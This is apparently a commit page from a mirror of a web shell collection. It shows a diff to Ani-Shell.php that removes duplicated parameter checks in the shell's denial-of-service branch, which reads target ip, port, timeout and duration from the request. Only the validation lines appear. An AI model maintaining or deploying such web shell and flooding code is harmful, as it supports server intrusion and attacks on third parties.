mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
Repeated subexpressions in Ani-Shell.php
Looks like repeated expressions `isset($_GET['exTime'])` and `$_GET['exTime'] != ""` can be removed.
This commit is contained in:
parent
ef86ed3531
commit
ebc1b5a405
1 changed files with 1 additions and 3 deletions
|
@ -1939,12 +1939,10 @@ else if(isset($_GET['dos']))
|
|||
isset($_GET['exTime']) &&
|
||||
isset($_GET['port']) &&
|
||||
isset($_GET['timeout']) &&
|
||||
isset($_GET['exTime']) &&
|
||||
$_GET['exTime'] != "" &&
|
||||
$_GET['port'] != "" &&
|
||||
$_GET['ip'] != "" &&
|
||||
$_GET['timeout'] != "" &&
|
||||
$_GET['exTime'] != ""
|
||||
$_GET['timeout'] != ""
|
||||
)
|
||||
{
|
||||
$IP=$_GET['ip'];
|
||||
|
|
Loading…
Reference in a new issue